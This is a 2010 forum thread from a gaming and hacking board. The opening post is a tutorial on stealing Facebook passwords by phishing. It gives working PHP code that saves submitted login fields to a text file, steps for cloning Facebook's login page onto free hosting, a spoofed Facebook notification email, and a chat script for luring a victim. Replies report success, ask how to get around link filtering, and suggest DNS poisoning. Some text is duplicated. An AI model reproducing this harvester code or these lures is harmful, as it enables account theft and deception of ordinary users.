Post: Tutorial on howto hack Facebook accounts. (Phishing)
Options
05-07-2010, 08:12 AM
#1
lxzer
Do a barrel roll!
Hack
A
A
Facebook
Account
Gaining access to ones Facebook account without any prior knowledge to the users password prior to phishing is not as hard as one may pres-eve it to be. Read on and you will learn how to do this.
How will this be done? You will be able to gain acess to another users facebook profile by using a method known as "phishing"
Phishing.
What is phishing and how is it done?
Phishing is the process of directing users to enter details into a fake website that look and feel like the legitimate one.
Basically all you are doing is getting your target to login to your fake login page and you will be sent their Facebook email and password.
Lets get started!
HOW
Sign up on a free webpage hosting site. I prefer You must login or register to view this content. as it is the easiest free hosting site to use (in my opinion) and doesn't remove your webpage once it has been created.
Once you have signed up click on " You must login or register to view this content. "
Now click on " You must login or register to view this content. "
Once you are in your files click on create text file.
You are going to need to name the file " Login.php " (Don't include quotations )
You are now going to visit this site by clicking You must login or register to view this content.
You are going to now view the source of the page and select all of the text, you are going to copy the text.
now go on back to your text file named " login.php " that you made earlier. You are going to paste the text that you copied from Facebook into your text file. Once done, click on "create"
Now go back to " My Files " And create another text file.
You are going to name this file " Phishing.php " (Don't include quotations )
now copy and paste this:
Originally posted by another user
<?php
header ('Location: You must login or register to view this content. '
;
$handle = fopen("passwords.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "
");
}
fwrite($handle, "
");
fclose($handle);
exit;
?>
header ('Location: You must login or register to view this content. '
;$handle = fopen("passwords.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "
");
}
fwrite($handle, "
");
fclose($handle);
exit;
?>
Replace "XXXXXXXXXXXXXXXX" with your ripway username.
Now click on create.
go back to " my files " and your going to want to click on "edit" for your " login.php " file.
Once your editing " login.php " Your going to want to click in the body of the text and hit Ctrl F. This will open up a find function and your going to type in " action " ( without quotations )
It will bring you to something like this:
action="https://login.facebook.com/login.php?login_attempt=1"
your going to want to select everything within the quotations. ( You will select " You must login or register to view this content. " )
Now replace this with:
action="https://h1.ripway.com/XXXXXXXXXXXXXXXX/phishing.php?"
Replace the XXXXXXXXX's with your ripway username.
now click on " save "
Go back to " My Files " and go to where it says:
login.php
Direct Link: You must login or register to view this content.
[ Get HTML Codes | Rename | Edit ]
Copy " You must login or register to view this content. " The XXXX's will be your ripway username.
This is what your link to your webpage is, when you send this to people and they login to it their email and password will be displayed in " passwords.txt "
If at anytime you wish to view the email and password they entered just simply edit " passwords.txt " and bobs your uncle :y:
If for whatever reason this didn't work, then please ask a question on this thread. If this helped you then don't forget to thank or +REP me!
Where I learned this: [ame="https://www.youtube.com/watch?v=0fJOxdDjPn8"]LINK.[/ame]
HOWTO CONVINCE YOUR VICTIM TO LOGIN TO YOUR FAKE WEBPAGE.
There is several ways this may be accomplished but one that almost always works is to email spoof your victim and appear as if your Facebook. I personally like to use " [email][email protected][/email] " as it is the official notification email sender for Facebook.
Simply putting in " You must verify your Facebook account " persons name " failure at verifying your account will result in termination of your account.
Or you could simply put something like:
Bob Smith commented on his status:
"that doesn't make sense"
Reply to this email to comment on this status.
To see the comment thread, follow the link below:
You must login or register to view this content.
Thanks,
The Facebook Team
___
Find people from your Windows Live Hotmail address book on Facebook! Go to: You must login or register to view this content.
This message was intended for private@ private.com. If you do not wish to receive this type of email from Facebook in the future, please click on the link below to unsubscribe.
You must login or register to view this content.
Facebook's offices are located at 1601 S. California Ave., Palo Alto, CA 94304.
There is quiet a few tutorials on email spoofing but for a quick easy way to start email spoofing just use this You must login or register to view this content.
Also just talking over MSN and starting up a convo maybe saying things like:
You say: Hey
Target says: Hey
You say: Whats up?
Target says: Nothing jc, you?
You say: Nothing bored, you know bob was talking shmmmaccck about you right?
Target says: no, what?
You say: Yea its on Facebook he was calling you a silly pelican
Target says: that kid really grinds my gears, where did he post this?
You say: You must login or register to view this content.
And bobs your uncle :y:
Use whatever method works for you or create your own and post them here. Also Sending ripway links or any other phishing links directly over Facebook chat will get you suspended for a day or two, as i was suspended.
Plain and simple, this is as far as I know the only trojan/backdoor/keylogger free way to gain access to someones Facebook account. There is no " Facebook password cracker " Out there that works as far as im aware.
This was my first tutorial I have posted on this site so give me some critique, or if you thought it was a good tutorial or not!
This is pretty simple, but if you have any problems then just let me know!
If this helped you then don't forget to thank or +REP!
The following 33 users say thank you to lxzer for this useful post:
2RAW4THESTREET, Car Lover, Chewcracka, Classy., Cpt.Hayden, Darknesse13, Docko412, Encopresis, ESQ_Pugh, FAKA_ELITE, FourzerotwoFAILS, free, Goutinator, Joshycc, Matt1511, Mezzid, Mr. Star, Mudkipzzzz, Nejidam, NeverMoreModz, ozzy21, PatheticBowler, Perfekt, Pichu, Pro Era, Samos95, Toon_Squad, Weescotty, wiseguy48, wite_guy, xMagiik
06-24-2010, 10:49 PM
#56
lxzer
Do a barrel roll!
Originally posted by exhaale
yeah well, firefox prevents this from happening by telling you the website isn't legit. at least it does for me i think ... and anyways you'd have to be fairly retarded to fall into one of these traps?
you would be surprised.
06-24-2010, 11:42 PM
#57
AZ-Unit
Banned
Originally posted by exhaale
yeah well, firefox prevents this from happening by telling you the website isn't legit. at least it does for me i think ... and anyways you'd have to be fairly retarded to fall into one of these traps?
Firefox/Google's web forgery does not automatically filter these sites. They only are blocked once users have reported the url/IP. Have you ever heard of DNS poisoning? You can go to hotmail.com on your browser yet you will be directed to the "attackers" site while still displaying login.live.com / hotmail.com due to changes in the nameservers on your PC. They can also email spoof quite easily now with the public release in the last two years of spoofers, so skids have gone crazy with this. They can email you from [email][email protected][/email] and display a url looking like hotmail.com/ebay.com/paypal.com but it will redirect to their site upon clicking the link in the email.
06-30-2010, 03:49 PM
#58
warfox9
Guest
now this is a good phishing technique and quite a simple one too. I've tried it and it works even!
however, getting the phishin link to my victim is a different story though. here's what i do to conceal the "obvious" phishin link of h1.ripway.com and all that:
I send an email to my victim concealing the ripway url using hyperlink. i just type You must login or register to view this content. in the message box and hyperlink the text to my phishin link.
BUT the problem i'm facing is that my victim uses hotmail and hotmail disables hyperlinks!
i've been trying to find a workaround but till date no clue.
so i'm basically sitting with a WMD but cannot attach my victim! what an irony! :cry:
however, getting the phishin link to my victim is a different story though. here's what i do to conceal the "obvious" phishin link of h1.ripway.com and all that:
I send an email to my victim concealing the ripway url using hyperlink. i just type You must login or register to view this content. in the message box and hyperlink the text to my phishin link.
BUT the problem i'm facing is that my victim uses hotmail and hotmail disables hyperlinks!
i've been trying to find a workaround but till date no clue.so i'm basically sitting with a WMD but cannot attach my victim! what an irony! :cry:
06-30-2010, 04:02 PM
#59
WTFxHiTMaRKeR
Keeper
All I can say is Thank you for sharing this it is real easy to follow and for that I say thank you!
06-30-2010, 10:25 PM
#60
lxzer
Do a barrel roll!
Originally posted by WTFxHiTMaRKeR
All I can say is Thank you for sharing this it is real easy to follow and for that I say thank you!
Your welcome!
You can also thank me by clicking the "thanks" button :p
Originally posted by warfox9
now this is a good phishing technique and quite a simple one too. I've tried it and it works even!
however, getting the phishin link to my victim is a different story though. here's what i do to conceal the "obvious" phishin link of h1.ripway.com and all that:
I send an email to my victim concealing the ripway url using hyperlink. i just type You must login or register to view this content. in the message box and hyperlink the text to my phishin link.
BUT the problem i'm facing is that my victim uses hotmail and hotmail disables hyperlinks! i've been trying to find a workaround but till date no clue.
so i'm basically sitting with a WMD but cannot attach my victim! what an irony! :cry:
however, getting the phishin link to my victim is a different story though. here's what i do to conceal the "obvious" phishin link of h1.ripway.com and all that:
I send an email to my victim concealing the ripway url using hyperlink. i just type You must login or register to view this content. in the message box and hyperlink the text to my phishin link.
BUT the problem i'm facing is that my victim uses hotmail and hotmail disables hyperlinks!
i've been trying to find a workaround but till date no clue.so i'm basically sitting with a WMD but cannot attach my victim! what an irony! :cry:
Yea the only workaround for it either then hyper-linking is DNS Poising, try googling that and you might be able to stumble upon a tutorial.
^
07-20-2010, 05:50 PM
#64
Glitcher123
Haxor!
Nice tutorial, do you think you can find a similar method for a MySpace account?
Copyright © 2026, NextGenUpdate.
All Rights Reserved.
